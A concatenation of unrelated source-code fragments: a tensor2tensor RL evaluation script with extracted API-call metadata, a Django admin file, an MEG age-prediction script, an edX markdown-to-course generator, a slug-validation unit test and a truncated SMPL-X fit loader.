agent_type, planner_hparams, model_dir, log_every_steps=None,
video_writer=None
):
"""Returns an out-of-graph eval_fn using the Agent API."""
def eval_fn(env, loop_hparams, policy_hparams, policy_dir, sampling_temp):
"""Eval function."""
base_env = env
env = rl_utils.BatchStackWrapper(env, loop_hparams.frame_stack_size)
sim_env_kwargs = rl.make_simulated_env_kwargs(
base_env, loop_hparams, batch_size=planner_hparams.batch_size,
model_dir=model_dir
)
agent = make_agent(
agent_type, env, policy_hparams, policy_dir, sampling_temp,
sim_env_kwargs, loop_hparams.frame_stack_size,
planner_hparams.planning_horizon, planner_hparams.rollout_agent_type,
num_rollouts=planner_hparams.num_rollouts,
inner_batch_size=planner_hparams.batch_size, video_writer=video_writer,
env_type=planner_hparams.env_type
)
rl_utils.run_rollouts(
env, agent, env.reset(), log_every_steps=log_every_steps
)
assert len(base_env.current_epoch_rollouts()) == env.batch_size
return eval_fn
def evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir, eval_metrics_dir,
agent_type, eval_with_learner, log_every_steps, debug_video_path,
report_fn=None, report_metric=None
):
"""Evaluate."""
if eval_with_learner:
assert agent_type == "policy"
if report_fn:
assert report_metric is not None
eval_metrics_writer = tf.summary.FileWriter(eval_metrics_dir)
video_writer = None
kwargs = {}
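  # when not evaluating through the PolicyLearner, plug in an out-of-graph eval_fn built around the requested agent type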
if not eval_with_learner:
if debug_video_path:
video_writer = common_video.WholeVideoWriter(
fps=10, output_path=debug_video_path, file_format="avi")
kwargs["eval_fn"] = make_eval_fn_with_agent(
agent_type, planner_hparams, model_dir, log_every_steps=log_every_steps,
video_writer=video_writer
)
eval_metrics = rl_utils.evaluate_all_configs(
loop_hparams, policy_dir, **kwargs
)
rl_utils.summarize_metrics(eval_metrics_writer, eval_metrics, 0)
if video_writer is not None:
video_writer.finish_to_disk()
# Report metrics
if report_fn:
if report_metric == "mean_reward":
metric_name = rl_utils.get_metric_name(
sampling_temp=loop_hparams.eval_sampling_temps[0],
max_num_noops=loop_hparams.eval_max_num_noops,
clipped=False
)
report_fn(eval_metrics[metric_name], 0)
else:
report_fn(eval_metrics[report_metric], 0)
return eval_metrics
def get_game_for_worker(map_name, directory_id):
"""Get game for the given worker (directory) id."""
if map_name == "v100unfriendly":
games = ["chopper_command", "boxing", "asterix", "seaquest"]
worker_per_game = 5
elif map_name == "human_nice":
games = gym_env.ATARI_GAMES_WITH_HUMAN_SCORE_NICE
worker_per_game = 5
else:
raise ValueError("Unknown worker to game map name: %s" % map_name)
games.sort()
game_id = (directory_id - 1) // worker_per_game
tf.logging.info("Getting game %d from %s." % (game_id, games))
return games[game_id]
def main(_):
now = datetime.datetime.now()
now_tag = now.strftime("%Y_%m_%d_%H_%M")
loop_hparams = trainer_lib.create_hparams(
FLAGS.loop_hparams_set, FLAGS.loop_hparams
)
if FLAGS.worker_to_game_map and FLAGS.total_num_workers > 1:
loop_hparams.game = get_game_for_worker(
FLAGS.worker_to_game_map, FLAGS.worker_id + 1)
tf.logging.info("Set game to %s." % loop_hparams.game)
if FLAGS.full_eval:
loop_hparams.eval_rl_env_max_episode_steps = -1
planner_hparams = trainer_lib.create_hparams(
FLAGS.planner_hparams_set, FLAGS.planner_hparams
)
policy_dir = FLAGS.policy_dir
model_dir = FLAGS.model_dir
eval_metrics_dir = FLAGS.eval_metrics_dir
if FLAGS.output_dir:
cur_dir = FLAGS.output_dir
if FLAGS.total_num_workers > 1:
cur_dir = os.path.join(cur_dir, "%d" % (FLAGS.worker_id + 1))
policy_dir = os.path.join(cur_dir, "policy")
model_dir = os.path.join(cur_dir, "world_model")
eval_metrics_dir = os.path.join(cur_dir, "evaluator_" + now_tag)
tf.logging.info("Writing metrics to %s." % eval_metrics_dir)
if not tf.gfile.Exists(eval_metrics_dir):
tf.gfile.MkDir(eval_metrics_dir)
evaluate(
loop_hparams, planner_hparams, policy_dir, model_dir,
eval_metrics_dir, FLAGS.agent, FLAGS.eval_with_learner,
FLAGS.log_every_steps if FLAGS.log_every_steps > 0 else None,
debug_video_path=FLAGS.debug_video_path
)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run()
| [
"tensorflow.gfile.MkDir",
"tensorflow.logging.set_verbosity",
"tensor2tensor.rl.rl_utils.get_metric_name",
"tensorflow.app.run",
"tensorflow.gfile.Exists",
"tensor2tensor.rl.rl_utils.RandomAgent",
"tensor2tensor.rl.rl_utils.PolicyAgent",
"tensor2tensor.rl.rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames",
"tensor2tensor.rl.rl_utils.summarize_metrics",
"tensor2tensor.utils.trainer_lib.create_hparams",
"tensor2tensor.rl.rl_utils.evaluate_all_configs",
"tensor2tensor.rl.rl_utils.BatchStackWrapper",
"tensor2tensor.layers.common_video.WholeVideoWriter",
"tensorflow.summary.FileWriter",
"tensorflow.logging.info",
"os.path.join",
"datetime.datetime.now",
"tensorflow.contrib.training.HParams",
"tensor2tensor.models.research.rl.make_simulated_env_kwargs"
] | [((3123, 3255), 'tensorflow.contrib.training.HParams', 'tf.contrib.training.HParams', ([], {'num_rollouts': '(1)', 'planning_horizon': '(2)', 'rollout_agent_type': '"""random"""', 'batch_size': '(1)', 'env_type': '"""simulated"""'}), "(num_rollouts=1, planning_horizon=2,\n rollout_agent_type='random', batch_size=1, env_type='simulated')\n", (3150, 3255), True, 'import tensorflow as tf\n'), ((3346, 3481), 'tensorflow.contrib.training.HParams', 'tf.contrib.training.HParams', ([], {'num_rollouts': '(64)', 'planning_horizon': '(16)', 'rollout_agent_type': '"""policy"""', 'batch_size': '(64)', 'env_type': '"""simulated"""'}), "(num_rollouts=64, planning_horizon=16,\n rollout_agent_type='policy', batch_size=64, env_type='simulated')\n", (3373, 3481), True, 'import tensorflow as tf\n'), ((6676, 6715), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (['eval_metrics_dir'], {}), '(eval_metrics_dir)\n', (6697, 6715), True, 'import tensorflow as tf\n'), ((7111, 7176), 'tensor2tensor.rl.rl_utils.evaluate_all_configs', 'rl_utils.evaluate_all_configs', (['loop_hparams', 'policy_dir'], {}), '(loop_hparams, policy_dir, **kwargs)\n', (7140, 7176), False, 'from tensor2tensor.rl import rl_utils\n'), ((7189, 7253), 'tensor2tensor.rl.rl_utils.summarize_metrics', 'rl_utils.summarize_metrics', (['eval_metrics_writer', 'eval_metrics', '(0)'], {}), '(eval_metrics_writer, eval_metrics, 0)\n', (7215, 7253), False, 'from tensor2tensor.rl import rl_utils\n'), ((8203, 8265), 'tensorflow.logging.info', 'tf.logging.info', (["('Getting game %d from %s.' % (game_id, games))"], {}), "('Getting game %d from %s.' % (game_id, games))\n", (8218, 8265), True, 'import tensorflow as tf\n'), ((8313, 8336), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (8334, 8336), False, 'import datetime\n'), ((8397, 8467), 'tensor2tensor.utils.trainer_lib.create_hparams', 'trainer_lib.create_hparams', (['FLAGS.loop_hparams_set', 'FLAGS.loop_hparams'], {}), '(FLAGS.loop_hparams_set, FLAGS.loop_hparams)\n', (8423, 8467), False, 'from tensor2tensor.utils import trainer_lib\n'), ((8794, 8870), 'tensor2tensor.utils.trainer_lib.create_hparams', 'trainer_lib.create_hparams', (['FLAGS.planner_hparams_set', 'FLAGS.planner_hparams'], {}), '(FLAGS.planner_hparams_set, FLAGS.planner_hparams)\n', (8820, 8870), False, 'from tensor2tensor.utils import trainer_lib\n'), ((9749, 9790), 'tensorflow.logging.set_verbosity', 'tf.logging.set_verbosity', (['tf.logging.INFO'], {}), '(tf.logging.INFO)\n', (9773, 9790), True, 'import tensorflow as tf\n'), ((9793, 9805), 'tensorflow.app.run', 'tf.app.run', ([], {}), '()\n', (9803, 9805), True, 'import tensorflow as tf\n'), ((5511, 5573), 'tensor2tensor.rl.rl_utils.BatchStackWrapper', 'rl_utils.BatchStackWrapper', (['env', 'loop_hparams.frame_stack_size'], {}), '(env, loop_hparams.frame_stack_size)\n', (5537, 5573), False, 'from tensor2tensor.rl import rl_utils\n'), ((5595, 5712), 'tensor2tensor.models.research.rl.make_simulated_env_kwargs', 'rl.make_simulated_env_kwargs', (['base_env', 'loop_hparams'], {'batch_size': 'planner_hparams.batch_size', 'model_dir': 'model_dir'}), '(base_env, loop_hparams, batch_size=\n planner_hparams.batch_size, model_dir=model_dir)\n', (5623, 5712), False, 'from tensor2tensor.models.research import rl\n'), ((8645, 8699), 'tensorflow.logging.info', 'tf.logging.info', (["('Set game to %s.' % loop_hparams.game)"], {}), "('Set game to %s.' 
% loop_hparams.game)\n", (8660, 8699), True, 'import tensorflow as tf\n'), ((9162, 9193), 'os.path.join', 'os.path.join', (['cur_dir', '"""policy"""'], {}), "(cur_dir, 'policy')\n", (9174, 9193), False, 'import os\n'), ((9210, 9246), 'os.path.join', 'os.path.join', (['cur_dir', '"""world_model"""'], {}), "(cur_dir, 'world_model')\n", (9222, 9246), False, 'import os\n'), ((9270, 9315), 'os.path.join', 'os.path.join', (['cur_dir', "('evaluator_' + now_tag)"], {}), "(cur_dir, 'evaluator_' + now_tag)\n", (9282, 9315), False, 'import os\n'), ((9320, 9380), 'tensorflow.logging.info', 'tf.logging.info', (["('Writing metrics to %s.' % eval_metrics_dir)"], {}), "('Writing metrics to %s.' % eval_metrics_dir)\n", (9335, 9380), True, 'import tensorflow as tf\n'), ((6826, 6916), 'tensor2tensor.layers.common_video.WholeVideoWriter', 'common_video.WholeVideoWriter', ([], {'fps': '(10)', 'output_path': 'debug_video_path', 'file_format': '"""avi"""'}), "(fps=10, output_path=debug_video_path,\n file_format='avi')\n", (6855, 6916), False, 'from tensor2tensor.layers import common_video\n'), ((7415, 7556), 'tensor2tensor.rl.rl_utils.get_metric_name', 'rl_utils.get_metric_name', ([], {'sampling_temp': 'loop_hparams.eval_sampling_temps[0]', 'max_num_noops': 'loop_hparams.eval_max_num_noops', 'clipped': '(False)'}), '(sampling_temp=loop_hparams.eval_sampling_temps[0],\n max_num_noops=loop_hparams.eval_max_num_noops, clipped=False)\n', (7439, 7556), False, 'from tensor2tensor.rl import rl_utils\n'), ((9093, 9144), 'os.path.join', 'os.path.join', (['cur_dir', "('%d' % (FLAGS.worker_id + 1))"], {}), "(cur_dir, '%d' % (FLAGS.worker_id + 1))\n", (9105, 9144), False, 'import os\n'), ((9392, 9425), 'tensorflow.gfile.Exists', 'tf.gfile.Exists', (['eval_metrics_dir'], {}), '(eval_metrics_dir)\n', (9407, 9425), True, 'import tensorflow as tf\n'), ((9433, 9465), 'tensorflow.gfile.MkDir', 'tf.gfile.MkDir', (['eval_metrics_dir'], {}), '(eval_metrics_dir)\n', (9447, 9465), True, 'import tensorflow as tf\n'), ((3804, 3873), 'tensor2tensor.rl.rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames', 'rl_utils.SimulatedBatchGymEnvWithFixedInitialFrames', ([], {}), '(**sim_env_kwargs)\n', (3855, 3873), False, 'from tensor2tensor.rl import rl_utils\n'), ((4351, 4424), 'tensor2tensor.rl.rl_utils.RandomAgent', 'rl_utils.RandomAgent', (['batch_size', 'env.observation_space', 'env.action_space'], {}), '(batch_size, env.observation_space, env.action_space)\n', (4371, 4424), False, 'from tensor2tensor.rl import rl_utils\n'), ((4501, 4621), 'tensor2tensor.rl.rl_utils.PolicyAgent', 'rl_utils.PolicyAgent', (['batch_size', 'env.observation_space', 'env.action_space', 'policy_hparams', 'policy_dir', 'sampling_temp'], {}), '(batch_size, env.observation_space, env.action_space,\n policy_hparams, policy_dir, sampling_temp)\n', (4521, 4621), False, 'from tensor2tensor.rl import rl_utils\n'), ((4999, 5048), 'tensor2tensor.rl.rl_utils.BatchStackWrapper', 'rl_utils.BatchStackWrapper', (['env', 'frame_stack_size'], {}), '(env, frame_stack_size)\n', (5025, 5048), False, 'from tensor2tensor.rl import rl_utils\n')] |
from django.contrib import admin
from grandchallenge.components.models import (
ComponentInterface,
ComponentInterfaceValue,
)
class ComponentInterfaceAdmin(admin.ModelAdmin):
list_display = (
"pk",
"title",
"slug",
"kind",
"default_value",
"relative_path",
)
readonly_fields = (
"default_value",
"relative_path",
)
class ComponentInterfaceValueAdmin(admin.ModelAdmin):
list_display = ("pk", "interface", "value", "file", "image")
readonly_fields = ("interface", "value", "file", "image")
admin.site.register(ComponentInterface, ComponentInterfaceAdmin)
admin.site.register(ComponentInterfaceValue, ComponentInterfaceValueAdmin)
| [
"django.contrib.admin.site.register"
] | [((592, 656), 'django.contrib.admin.site.register', 'admin.site.register', (['ComponentInterface', 'ComponentInterfaceAdmin'], {}), '(ComponentInterface, ComponentInterfaceAdmin)\n', (611, 656), False, 'from django.contrib import admin\n'), ((657, 731), 'django.contrib.admin.site.register', 'admin.site.register', (['ComponentInterfaceValue', 'ComponentInterfaceValueAdmin'], {}), '(ComponentInterfaceValue, ComponentInterfaceValueAdmin)\n', (676, 731), False, 'from django.contrib import admin\n')] |
import os.path as op
import numpy as np
import pandas as pd
from sklearn.pipeline import make_pipeline
from sklearn.linear_model import RidgeCV
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import KFold, cross_val_score
import mne
from pyriemann.tangentspace import TangentSpace
import config_drago as cfg
meg = 'mag'
scale = 1e22
rank = 65
reg = 1e-6
seed = 42
n_jobs = 10
cv = KFold(n_splits=n_jobs, shuffle=True, random_state=seed)
def proj_covs_common(covs, picks, scale=scale, rank=rank, reg=reg):
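    # select the requested channels, project every covariance onto the top-rank
    # eigenvectors of the grand-average covariance, and add a small ridge (reg) to the diagonal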
covs = [d['covs'][:, picks][:, :, picks] for d in covs if 'subject' in d]
covs = scale * np.array(covs)
n_sub, n_fb, n_ch, n_ch = covs.shape
# covs2 = covs.reshape(n_sub*n_fb, n_ch, n_ch)
# covs_avg = np.mean(covs2, axis=0)
covs_avg = covs.mean(axis=1).mean(axis=0)
d, V = np.linalg.eigh(covs_avg)
d = d[::-1]
V = V[:, ::-1]
proj_mat = V[:, :rank].T
covs_proj = np.zeros((n_sub, n_fb, rank, rank))
for sub in range(n_sub):
for fb in range(n_fb):
covs_proj[sub, fb] = proj_mat @ covs[sub, fb] @ proj_mat.T
covs_proj[sub, fb] += reg * np.eye(rank)
return covs_proj
def proj_covs_ts(covs):
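    # vectorize each projected covariance with a Wasserstein-metric tangent-space mapping, one vector per frequency band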
n_sub, n_fb, p, _ = covs.shape
covs_ts = np.zeros((n_sub, n_fb, (p*(p+1))//2))
for fb in range(n_fb):
covs_ts[:, fb, :] = TangentSpace(metric="wasserstein").fit(
covs[:, fb, :, :]).transform(covs[:, fb, :, :])
return covs_ts
file_covs = op.join(cfg.path_outputs, 'covs_allch_oas.float32.h5')
covs_allch = mne.externals.h5io.read_hdf5(file_covs) # (sub, fb, ch, ch)
info = np.load(op.join(cfg.path_data, 'info_allch.npy')).item()
picks = mne.pick_types(info, meg=meg)
covs = proj_covs_common(covs_allch, picks, scale=scale, rank=rank, reg=reg)
X = proj_covs_ts(covs)
X = X.reshape(len(X), -1)
info = pd.read_csv(op.join(cfg.path_data, 'participants.csv'))
subjects = [d['subject'] for d in covs_allch if 'subject' in d]
y = info.set_index('Observations').age.loc[subjects]
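# standardized tangent-space features -> cross-validated RidgeCV; the negated scores give the mean absolute error of age prediction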
ridge = make_pipeline(StandardScaler(),
RidgeCV(alphas=np.logspace(-3, 5, 100)))
score = - cross_val_score(ridge, X, y, cv=cv,
scoring="neg_mean_absolute_error", n_jobs=n_jobs,
verbose=True)
| [
"numpy.linalg.eigh",
"numpy.eye",
"pyriemann.tangentspace.TangentSpace",
"mne.pick_types",
"os.path.join",
"sklearn.preprocessing.StandardScaler",
"numpy.array",
"numpy.zeros",
"mne.externals.h5io.read_hdf5",
"sklearn.model_selection.KFold",
"numpy.logspace",
"sklearn.model_selection.cross_val_score"
] | [((414, 469), 'sklearn.model_selection.KFold', 'KFold', ([], {'n_splits': 'n_jobs', 'shuffle': '(True)', 'random_state': 'seed'}), '(n_splits=n_jobs, shuffle=True, random_state=seed)\n', (419, 469), False, 'from sklearn.model_selection import KFold, cross_val_score\n'), ((1494, 1548), 'os.path.join', 'op.join', (['cfg.path_outputs', '"""covs_allch_oas.float32.h5"""'], {}), "(cfg.path_outputs, 'covs_allch_oas.float32.h5')\n", (1501, 1548), True, 'import os.path as op\n'), ((1562, 1601), 'mne.externals.h5io.read_hdf5', 'mne.externals.h5io.read_hdf5', (['file_covs'], {}), '(file_covs)\n', (1590, 1601), False, 'import mne\n'), ((1696, 1725), 'mne.pick_types', 'mne.pick_types', (['info'], {'meg': 'meg'}), '(info, meg=meg)\n', (1710, 1725), False, 'import mne\n'), ((842, 866), 'numpy.linalg.eigh', 'np.linalg.eigh', (['covs_avg'], {}), '(covs_avg)\n', (856, 866), True, 'import numpy as np\n'), ((948, 983), 'numpy.zeros', 'np.zeros', (['(n_sub, n_fb, rank, rank)'], {}), '((n_sub, n_fb, rank, rank))\n', (956, 983), True, 'import numpy as np\n'), ((1264, 1305), 'numpy.zeros', 'np.zeros', (['(n_sub, n_fb, p * (p + 1) // 2)'], {}), '((n_sub, n_fb, p * (p + 1) // 2))\n', (1272, 1305), True, 'import numpy as np\n'), ((1872, 1914), 'os.path.join', 'op.join', (['cfg.path_data', '"""participants.csv"""'], {}), "(cfg.path_data, 'participants.csv')\n", (1879, 1914), True, 'import os.path as op\n'), ((2056, 2072), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (2070, 2072), False, 'from sklearn.preprocessing import StandardScaler\n'), ((2147, 2250), 'sklearn.model_selection.cross_val_score', 'cross_val_score', (['ridge', 'X', 'y'], {'cv': 'cv', 'scoring': '"""neg_mean_absolute_error"""', 'n_jobs': 'n_jobs', 'verbose': '(True)'}), "(ridge, X, y, cv=cv, scoring='neg_mean_absolute_error',\n n_jobs=n_jobs, verbose=True)\n", (2162, 2250), False, 'from sklearn.model_selection import KFold, cross_val_score\n'), ((637, 651), 'numpy.array', 'np.array', (['covs'], {}), '(covs)\n', (645, 651), True, 'import numpy as np\n'), ((1639, 1679), 'os.path.join', 'op.join', (['cfg.path_data', '"""info_allch.npy"""'], {}), "(cfg.path_data, 'info_allch.npy')\n", (1646, 1679), True, 'import os.path as op\n'), ((2111, 2134), 'numpy.logspace', 'np.logspace', (['(-3)', '(5)', '(100)'], {}), '(-3, 5, 100)\n', (2122, 2134), True, 'import numpy as np\n'), ((1155, 1167), 'numpy.eye', 'np.eye', (['rank'], {}), '(rank)\n', (1161, 1167), True, 'import numpy as np\n'), ((1357, 1391), 'pyriemann.tangentspace.TangentSpace', 'TangentSpace', ([], {'metric': '"""wasserstein"""'}), "(metric='wasserstein')\n", (1369, 1391), False, 'from pyriemann.tangentspace import TangentSpace\n')] |
import sys, os
import tarfile
import shutil
from edx_gen import _edx_consts
from edx_gen import _read_metadata
from edx_gen import _write_structure
from edx_gen import _write_comps
from edx_gen import _write_comp_html
from edx_gen import _write_comp_checkboxes
from edx_gen import _write_comp_video
from edx_gen import _xml_google_doc
from edx_gen import _markdown
from edx_gen import _util
import __SETTINGS__
#--------------------------------------------------------------------------------------------------
# Text strings
WARNING = " WARNING:"
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def writeCompsForUnit(md_filepath, unit_filename):
# print("component_path", component_path)
# generate the files in the right folders
tree_snippets = _markdown.convertMd(md_filepath)
# check we have at least 2 snippets, the header and one component
if len(tree_snippets) <= 1:
print(WARNING, 'The markdown file does not seem to contain any components:', md_filepath)
# get the display name of the unit
first_h1_tag = list(tree_snippets[0].iter('h1'))[0]
unit_display_name = first_h1_tag.get('display_name')
# list to store all files
unit_comps = []
# process components
for i in range(1, len(tree_snippets)):
tree_snippet = tree_snippets[i]
# generate the files
new_filename = unit_filename + '_c' + str(i)
comp_files = _writeFilesForSnippet(md_filepath, new_filename, tree_snippet, unit_filename, unit_display_name)
unit_comps.extend(comp_files)
# return the result
return unit_comps
#--------------------------------------------------------------------------------------------------
# write to either units folder or problems folder, depending on the type
def _writeFilesForSnippet(md_filepath, comp_filename, tree_snippet, unit_filename, unit_display_name):
meta_tag = None
comp_type = None
# meta_text = None
# get the h1 tags
h1_tags = list(tree_snippet.iter('h1'))
if len(h1_tags) == 0:
print(WARNING, 'The snippet does not start with any settings:', md_filepath)
return
# get the meta tag for the snippet
meta_tag = h1_tags[0] # the first h1 the should contain the meta data
# # check the meta tag text
# meta_text = meta_tag.text.strip()
# if meta_text == None or meta_text != 'UNIT':
# print(WARNING, 'The markdown file must start with the "UNIT" settings:', component_path)
# print(WARNING, 'Make sure that the first line of the markdown file is blank')
# get the type for this component
comp_type = meta_tag.get('type')
if comp_type == None or comp_type not in _edx_consts.METADATA_ENUMS['type']:
print(WARNING, 'The "type" setting is not recognised:', md_filepath)
print(WARNING, ' Found:', comp_type)
print(WARNING, ' Valid options:', _edx_consts.METADATA_ENUMS['type'])
# write xml and/or html files
if comp_type == 'html':
print(" |_ HTML COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_HTML_REQ, _edx_consts.COMP_HTML_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "html" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_html.writeXmlForHtmlComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'problem-checkboxes':
print(" |_ PROBLEM CHECKBOXES")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_PROB_QUIZ_REQ, _edx_consts.COMP_PROB_QUIZ_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "problem-checkboxes" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_PROBS_FOLDER
# return the list of files
return _write_comp_checkboxes.writeXmlForProbCheckboxesComp(
md_filepath, comp_filename, tree_snippet, settings, unit_filename)
elif comp_type == 'video':
print(" |_ VIDEO COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(
md_filepath, meta_tag, _edx_consts.COMP_VIDEO_REQ, _edx_consts.COMP_VIDEO_OPT )
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "video" component:', md_filepath)
return
# remove h1 meta_tag from the tree so it does not end up in the output
tree_snippet.remove(meta_tag)
# write .xml file to COMP_VIDS_FOLDER
# for each language
# write .html file to COMP_HTML_FOLDER
# write .xml file to COMP_HTML_FOLDER
# return the list of files
return _write_comp_video.writeXmlForVidComp(
md_filepath, comp_filename, settings, unit_filename)
elif comp_type == 'google-doc':
print(" |_ GOOGLE DOC COMP")
# get the setting out of the meta_tag
settings = _read_metadata.getMetaSettings(md_filepath, meta_tag,
_edx_consts.COMP_GOOGLE_DOC_REQ, _edx_consts.COMP_GOOGLE_DOC_OPT)
# check that we have settings
if not settings:
print(WARNING, 'There seem to be no settings for this "Google Doc" component:', md_filepath)
return
# in this case, no files are written
# we return the component tag instead
return _xml_google_doc.tagForGoogleDocComp(comp_filename, settings, unit_filename)
else:
print(WARNING, 'Component type not recognised:', comp_type, "in", md_filepath)
#--------------------------------------------------------------------------------------------------
| [
"edx_gen._write_comp_checkboxes.writeXmlForProbCheckboxesComp",
"edx_gen._markdown.convertMd",
"edx_gen._read_metadata.getMetaSettings",
"edx_gen._xml_google_doc.tagForGoogleDocComp",
"edx_gen._write_comp_html.writeXmlForHtmlComp",
"edx_gen._write_comp_video.writeXmlForVidComp"
] | [((903, 935), 'edx_gen._markdown.convertMd', '_markdown.convertMd', (['md_filepath'], {}), '(md_filepath)\n', (922, 935), False, 'from edx_gen import _markdown\n'), ((3218, 3330), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', (['md_filepath', 'meta_tag', '_edx_consts.COMP_HTML_REQ', '_edx_consts.COMP_HTML_OPT'], {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_HTML_REQ, _edx_consts.COMP_HTML_OPT)\n', (3248, 3330), False, 'from edx_gen import _read_metadata\n'), ((3784, 3891), 'edx_gen._write_comp_html.writeXmlForHtmlComp', '_write_comp_html.writeXmlForHtmlComp', (['md_filepath', 'comp_filename', 'tree_snippet', 'settings', 'unit_filename'], {}), '(md_filepath, comp_filename,\n tree_snippet, settings, unit_filename)\n', (3820, 3891), False, 'from edx_gen import _write_comp_html\n'), ((4059, 4181), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', (['md_filepath', 'meta_tag', '_edx_consts.COMP_PROB_QUIZ_REQ', '_edx_consts.COMP_PROB_QUIZ_OPT'], {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_PROB_QUIZ_REQ, _edx_consts.COMP_PROB_QUIZ_OPT)\n', (4089, 4181), False, 'from edx_gen import _read_metadata\n'), ((4603, 4726), 'edx_gen._write_comp_checkboxes.writeXmlForProbCheckboxesComp', '_write_comp_checkboxes.writeXmlForProbCheckboxesComp', (['md_filepath', 'comp_filename', 'tree_snippet', 'settings', 'unit_filename'], {}), '(md_filepath,\n comp_filename, tree_snippet, settings, unit_filename)\n', (4655, 4726), False, 'from edx_gen import _write_comp_checkboxes\n'), ((4878, 4992), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', (['md_filepath', 'meta_tag', '_edx_consts.COMP_VIDEO_REQ', '_edx_consts.COMP_VIDEO_OPT'], {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_VIDEO_REQ, _edx_consts.COMP_VIDEO_OPT)\n', (4908, 4992), False, 'from edx_gen import _read_metadata\n'), ((5521, 5614), 'edx_gen._write_comp_video.writeXmlForVidComp', '_write_comp_video.writeXmlForVidComp', (['md_filepath', 'comp_filename', 'settings', 'unit_filename'], {}), '(md_filepath, comp_filename, settings,\n unit_filename)\n', (5557, 5614), False, 'from edx_gen import _write_comp_video\n'), ((5768, 5892), 'edx_gen._read_metadata.getMetaSettings', '_read_metadata.getMetaSettings', (['md_filepath', 'meta_tag', '_edx_consts.COMP_GOOGLE_DOC_REQ', '_edx_consts.COMP_GOOGLE_DOC_OPT'], {}), '(md_filepath, meta_tag, _edx_consts.\n COMP_GOOGLE_DOC_REQ, _edx_consts.COMP_GOOGLE_DOC_OPT)\n', (5798, 5892), False, 'from edx_gen import _read_metadata\n'), ((6195, 6270), 'edx_gen._xml_google_doc.tagForGoogleDocComp', '_xml_google_doc.tagForGoogleDocComp', (['comp_filename', 'settings', 'unit_filename'], {}), '(comp_filename, settings, unit_filename)\n', (6230, 6270), False, 'from edx_gen import _xml_google_doc\n')] |
import unittest
from recipe import utils
class UtilTestCase(unittest.TestCase):
def test_valid_project_slug(self):
project_slug = "Recipe0123456789_mock"
self.assertTrue(utils.valid_project_slug(project_slug))
project_slug = 'Recipe00000000000000000000000000000000000000000000'
self.assertTrue(utils.valid_project_slug(project_slug))
project_slug = ""
self.assertFalse(utils.valid_project_slug(project_slug))
project_slug = "Recipe000000000000000000000000000000000000000000001"
self.assertFalse(utils.valid_project_slug(project_slug))
project_slug = "-!@#$%^&*()_+"
self.assertFalse(utils.valid_project_slug(project_slug))
| [
"recipe.utils.valid_project_slug"
] | [((201, 239), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', (['project_slug'], {}), '(project_slug)\n', (225, 239), False, 'from recipe import utils\n'), ((345, 383), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', (['project_slug'], {}), '(project_slug)\n', (369, 383), False, 'from recipe import utils\n'), ((440, 478), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', (['project_slug'], {}), '(project_slug)\n', (464, 478), False, 'from recipe import utils\n'), ((586, 624), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', (['project_slug'], {}), '(project_slug)\n', (610, 624), False, 'from recipe import utils\n'), ((694, 732), 'recipe.utils.valid_project_slug', 'utils.valid_project_slug', (['project_slug'], {}), '(project_slug)\n', (718, 732), False, 'from recipe import utils\n')] |
import numpy as np
import cv2
import os.path as osp
import json
from human_body_prior.tools.model_loader import load_vposer
import torch
vposer_ckpt = '/Vol1/dbstore/datasets/a.vakhitov/projects/pykinect_fresh/smplify-x/smplify-x-data/vposer_v1_0/'
def load_avakhitov_fits_vposer(vposer, part_path, dev_lbl):
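    # load per-frame fit parameters (poses, expressions, betas) saved by the fitting pipeline,
    # decode VPoser body-pose embeddings to axis-angle when needed, and apply the device's rigid transform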
poses = np.load(part_path + '/poses.npy')[:-1]
face_expressions = np.load(part_path + '/expressions.npy')[:-1] * 1e2
betas = np.load(part_path + '/betas.npy')
fid_lst = np.load(part_path + '/fid_lst.npy')
with open(part_path + '/config.json', 'r') as f:
config = json.load(f)
# do we use vposer embeddings
is_vposer = config['is_vposer']
# gender of a subject
is_male = config['is_male']
# id of a device (used to decode the rigid pose of the device)
assert len(fid_lst) == len(poses), f'{len(fid_lst)} != {len(poses)}'
assert len(fid_lst) == len(face_expressions), f'{len(fid_lst)} != {len(face_expressions)}'
n = len(poses)
frame_index2fit_index = {
fid_lst[i]: i
for i in range(n)
}
# load the device pose
dev_lst = config['dev_lst']
dev_id = 0
while dev_lst[dev_id] != dev_lbl:
dev_id += 1
dev_orient = None
dev_trans = None
if dev_id > 0:
dev_orient = np.load(part_path + '/dev_orient.npy')
dev_trans = np.load(part_path + '/dev_trans.npy')
rot = poses[:, -3:]
trans = poses[:, -6:-3]
if is_vposer:
pose_body_vp = torch.tensor(poses[:, 0:32])
# convert from vposer to rotation matrices
pose_body_list = []
for i in range(n):
